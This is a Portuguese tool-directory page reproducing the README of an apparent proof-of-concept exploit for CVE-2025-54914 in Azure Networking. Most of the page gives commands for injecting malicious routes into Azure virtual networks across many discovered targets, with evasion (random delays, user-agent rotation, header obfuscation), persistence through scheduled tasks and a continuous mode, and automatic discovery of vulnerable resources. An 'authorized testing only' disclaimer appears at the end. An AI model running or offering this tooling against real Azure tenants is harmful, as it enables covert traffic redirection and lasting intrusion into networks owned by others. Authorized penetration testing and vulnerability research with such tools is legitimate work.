Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-54914-PoC — Exploit para CVE-2025-54914 em Azure Networking, criando rotas maliciosas com evasão, persistência, varredura de múltiplos alvos e relatórios para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/ash1996x/cve-2025-54914-poc
ReconhecimentoMecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoEvasão de IDS/IPSTestes de PenetraçãoSegurança na Nuvem
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

Exploit para CVE-2025-54914 em Azure Networking, criando rotas maliciosas com evasão, persistência, varredura de múltiplos alvos e relatórios para testes de segurança autorizados.

Ver Repositório
4425há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-54914 Exploração de Rotas do Azure

Visão Geral

Esta é uma implementação melhorada do exploit de rota de rede do Azure CVE-2025-54914. Esta versão mantém a funcionalidade principal do CVE enquanto adiciona mais recursos, incluindo persistência, evasão, varredura multi-alvo e tratamento de erros.

Recursos

Funcionalidade Principal do CVE

  • Criação de Rotas: Cria rotas maliciosas em redes virtuais do Azure
  • Exclusão de Rotas: Remove rotas criadas para limpeza
  • Compatibilidade de API: Funciona com a API de Gerenciamento do Azure 2025-09-01
  • Autenticação: Suporta autenticação via Azure CLI e token manual

Recursos

  • Técnicas de Evasão: Atrasos aleatórios, rotação de user agent, ofuscação de requisições
  • Persistência: Criação de tarefas agendadas, modo de monitoramento contínuo
  • Varredura Multi-Alvo: Varredura e exploração concorrente de múltiplos alvos
  • Relatórios Abrangentes: Relatórios detalhados com análise de sucesso/fracasso
  • Tratamento de Erros: Manipulação graciosa de falhas e recuperação
  • Gerenciamento de Configuração: Configuração de alvos baseada em JSON
  • Descoberta de Alvos: Descoberta automática de recursos vulneráveis
  • Avaliação de Risco: Análise de vulnerabilidade e pontuação de risco

Instalação

Pré-requisitos

root@kitploit:~
# Install Python dependencies
pip install requests

# Install Azure CLI (for authentication)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Configuração

root@kitploit:~
# Make scripts executable
chmod +x exploit.py
chmod +x exploit_utils.py

# Authenticate with Azure
az login

Uso

Uso Básico

Exploração de Alvo Único

root@kitploit:~
# Create route on single target
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Delete route
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

Exploração Multi-Alvo

root@kitploit:~
# Create configuration file
python exploit_utils.py discover --output targets.json

# Exploit all targets
python exploit.py --targets-file targets.json --operation create

Modo de Varredura

root@kitploit:~
# Scan targets without exploitation
python exploit.py --targets-file targets.json --scan-only

Modo de Persistência

root@kitploit:~
# Enable persistence with 30-minute intervals
python exploit.py --targets-file targets.json --persistence-mode --interval 30

Uso Avançado

Evasão e Furtividade

root@kitploit:~
# Custom delay ranges for evasion
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

Modo de Teste (Dry Run)

root@kitploit:~
# Test without actual exploitation
python exploit.py --targets-file targets.json --dry-run

Log Detalhado

root@kitploit:~
# Enable debug logging
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

Configuração

Formato de Configuração de Alvos

root@kitploit:~
{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Target configuration for CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

Variáveis de Ambiente

root@kitploit:~
# Azure access token (alternative to Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"

# Log level
export LOG_LEVEL="INFO"

Scripts Utilitários

Descoberta de Alvos

root@kitploit:~
# Discover all accessible targets
python exploit_utils.py discover --output discovered_targets.json

# Discover specific subscriptions
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

Geração de Configuração

root@kitploit:~
# Generate exploit configuration from discovered targets
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

Análise de Vulnerabilidade

root@kitploit:~
# Analyze targets for risk assessment
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

Recursos de Segurança

Técnicas de Evasão

  • Temporização de Requisições: Atrasos aleatórios entre requisições
  • Rotação de User Agent: Vários user agents de navegador
  • Ofuscação de Cabeçalhos: Cabeçalhos HTTP realistas
  • Verificação SSL: Validação adequada de certificados

Mecanismos de Persistência

  • Tarefas Agendadas: Criação de tarefas agendadas no Windows
  • Modo Contínuo: Persistência de longa duração
  • Gerenciamento de Sessão: Preservação de estado entre execuções
  • Persistência de Configuração: Configurações salvas em disco

Tratamento de Erros

  • Degradação Graciosa: Continua em falhas individuais
  • Proteção contra Timeout: Previne requisições penduradas
  • Tratamento de Sinais: Desligamento limpo ao interromper
  • Limpeza de Recursos: Limpeza automática ao sair

Relatórios

Relatórios de Exploração

  • Resultados da Operação: Sucesso/fracasso para cada alvo
  • Informações de Tempo: Carimbos de data/hora de execução
  • Detalhes do Erro: Mensagens de erro detalhadas
  • Estatísticas Resumidas: Taxas de sucesso gerais

Relatórios de Descoberta

  • Inventário de Alvos: Lista completa de recursos descobertos
  • Detalhamento por Assinatura: Alvos agrupados por assinatura
  • Detalhes do Recurso: Informações de VNet, sub-rede e localização

Análise de Vulnerabilidade

  • Avaliação de Risco: Categorização de risco alto/médio/baixo
  • Indicadores de Produção: Identificação de ambientes de produção
  • Análise de Tags: Pontuação de risco baseada em tags de recursos

Melhores Práticas

Segurança Operacional

  1. Use o Modo Dry Run: Sempre teste com --dry-run primeiro
  2. Limite o Escopo: Comece com ambientes não produtivos
  3. Monitore os Logs: Revise logs para comportamento inesperado
  4. Faça a Limpeza: Remova rotas criadas após o teste

Otimização de Desempenho

  1. Limites de Workers: Ajuste --max-workers conforme a capacidade do sistema
  2. Ajuste de Atraso: Equilibre furtividade vs. velocidade com configurações de atraso
  3. Processamento em Lote: Use arquivos de alvos para operações em larga escala
  4. Monitoramento de Recursos: Monitore recursos do sistema durante a execução

Recuperação de Erros

  1. Verifique os Logs: Revise mensagens de erro para solução de problemas
  2. Verifique Permissões: Garanta permissões adequadas do Azure
  3. Conectividade de Rede: Verifique a conectividade com a Internet
  4. Validade do Token: Verifique o status de autenticação do Azure CLI

Solução de Problemas

Problemas Comuns

Erros de Autenticação

root@kitploit:~
# Re-authenticate with Azure
az login

# Check current account
az account show

# List accessible subscriptions
az account list

Erros de Permissão

root@kitploit:~
# Check required permissions
az role assignment list --assignee $(az account show --query user.name -o tsv)

Erros de Rede

root@kitploit:~
# Test connectivity
curl -I https://management.azure.com

# Check proxy settings
echo $HTTP_PROXY
echo $HTTPS_PROXY

Modo de Depuração

root@kitploit:~
# Enable detailed logging
python exploit.py --log-level DEBUG --log-file debug.log

# Check log file
tail -f debug.log

Considerações Legais e Éticas

⚠️ IMPORTANTE: Esta ferramenta é apenas para testes de segurança autorizados.

  • Autorização Necessária: Use apenas em sistemas que você possui ou tem permissão explícita para testar
  • Conformidade Legal: Garanta conformidade com leis e regulamentos locais
  • Divulgação Responsável: Reporte vulnerabilidades através dos canais adequados
  • Uso Educacional: Esta ferramenta é destinada apenas para fins educacionais e de pesquisa

Licença

Este projeto é licenciado apenas para uso em pesquisa e educação. O uso comercial requer permissão explícita.

Contribuindo

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade
  3. Faça suas alterações
  4. Adicione testes se aplicável
  5. Envie um pull request

Suporte

Para problemas e perguntas:

  1. Consulte a seção de solução de problemas
  2. Revise os logs para detalhes do erro
  3. Crie uma issue com informações detalhadas
  4. Inclua configuração relevante e mensagens de erro
Baixar ferramenta